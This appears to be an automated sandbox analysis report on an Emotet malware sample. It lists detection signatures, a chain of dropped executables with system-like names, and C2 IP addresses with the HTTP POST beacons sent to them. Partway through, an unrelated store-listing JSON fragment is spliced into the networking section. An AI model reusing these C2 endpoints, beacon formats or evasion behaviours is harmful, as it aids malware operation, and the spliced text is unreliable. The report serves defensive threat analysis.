Analysis Report MV9tCJw8Xr

Overview

General Information

Sample Name: MV9tCJw8Xr (renamed file extension from none to exe)
Analysis ID: 356776
MD5: b12817c1c8ba085a7a82655fba90e53d
SHA1: 1f56268ada7ef3e7b788121cfa2ca1879cf70f1e
SHA256: 61e37534bfb2acbb787788100b1932f5011cbc98db86ce10b7a8a730d2a4de35

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • MV9tCJw8Xr.exe (PID: 6552 cmdline: 'C:\Users\user\Desktop\MV9tCJw8Xr.exe' MD5: B12817C1C8BA085A7A82655FBA90E53D)
    • KBDHEB.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe MD5: B12817C1C8BA085A7A82655FBA90E53D)
      • tokenbinding2.exe (PID: 6176 cmdline: 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA= MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
        • KBDHEB.exe (PID: 3596 cmdline: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
          • execmodelproxy.exe (PID: 3316 cmdline: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
            • COLORCNV.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
              • usp10.exe (PID: 5260 cmdline: C:\Windows\SysWOW64\glu32\usp10.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                • KBDINTAM.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                  • msrd2x40.exe (PID: 2772 cmdline: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                    • MCCSEngineShared.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                      • jscript9.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                        • wmvdspa.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\ftp\wmvdspa.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                          • msvcr100_clr0400.exe (PID: 7028 cmdline: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                            • catsrvut.exe (PID: 5652 cmdline: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                              • mprdim.exe (PID: 1856 cmdline: C:\Windows\SysWOW64\d3dramp\mprdim.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
  • svchost.exe (PID: 6836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5676 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5532 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4924 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5452 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2828 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4620 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 204 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
32.2.jscript9.exe.400000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
2.2.KBDHEB.exe.5b053f.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
30.2.msrd2x40.exe.400000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
22.2.tokenbinding2.exe.400000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
37.2.catsrvut.exe.2ae279e.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: MV9tCJw8Xr.exe, Avira: detected
Found malware configuration
Source: 23.2.KBDHEB.exe.2b6279e.3.raw.unpack, Malware Configuration Extractor: Emotet
Multi AV Scanner detection for dropped file
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe, Metadefender: Detection: 54%
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe, ReversingLabs: Detection: 92%
Multi AV Scanner detection for submitted file
Source: MV9tCJw8Xr.exe, Virustotal: Detection: 66%
Source: MV9tCJw8Xr.exe, Metadefender: Detection: 56%
Source: MV9tCJw8Xr.exe, ReversingLabs: Detection: 77%
Machine Learning detection for dropped file
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe, Joe Sandbox ML: detected
Source: 2.2.KBDHEB.exe.5b053f.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
Source: 1.2.MV9tCJw8Xr.exe.218053f.2.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe, Code function: 2_2_021D1D83 CryptDecodeObjectEx
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe, Code function: 22_2_00401000 GetProcessHeap,RtlAllocateHeap,CryptStringToBinaryW,CryptStringToBinaryW

Compliance:

Uses 32bit PE files
Source: MV9tCJw8Xr.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\MV9tCJw8Xr.exe, Code function: 1_2_021E28D9 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe, Code function: 2_2_021D28D9 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe, Code function: 22_2_00A58C57 FindFirstFileExW
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe, Code function: 22_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe, Code function: 23_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe, Code function: 26_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe, Code function: 27_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose

Networking:

C2 URLs / IPs found in malware configuration
Source: unknown, Network traffic detected: IP country count 35
Source: global traffic, TCP traffic: 192.168.2.7:49734 -> 79.143.178.194:8080
Source: global traffic, TCP traffic: 192.168.2.7:49742 -> 87.106.136.232:8080
Source: global traffic, TCP traffic: 192.168.2.7:49752 -> 87.106.139.101:8080
Source: Joe Sandbox View, IP Address: 143.95.101.72
Source: Joe Sandbox View, ASN Name: GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View, ASN Name: CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN
Source: Joe Sandbox View, ASN Name: OCNNTTCommunicationsCorporationJP
Source: global traffic, TCP traffic: 192.168.2.7:49726 -> 190.144.18.198:80
Source: global traffic, HTTP traffic detected:
  POST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1
  Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/
  Content-Type: multipart/form-data; boundary=---------------------------270479976396707
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 87.106.139.101:8080
  Content-Length: 4596
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  POST /LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/ HTTP/1.1
  Referer: http://87.106.139.101/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/
  Content-Type: multipart/form-data; boundary=---------------------------478597482596704
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 87.106.139.101:8080
  Content-Length: 4596
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 190.144.18.198
Source: unknown, TCP traffic detected without corresponding DNS query: 79.143.178.194
Source: unknown, TCP traffic detected without corresponding DNS query: 87.106.136.232
Source: unknown, TCP traffic detected without corresponding DNS query: 87.106.139.101
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe Code function: 2_2_021D2014 InternetReadFile,2_2_021D2014
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: unknown
HTTP traffic detected:
POST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1
Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/
Content-Type: multipart/form-data; boundary=---------------------------270479976396707
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 87.106.139.101:8080
Content-Length: 4596
Connection: Keep-Alive
Cache-Control: no-cache
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmpString found in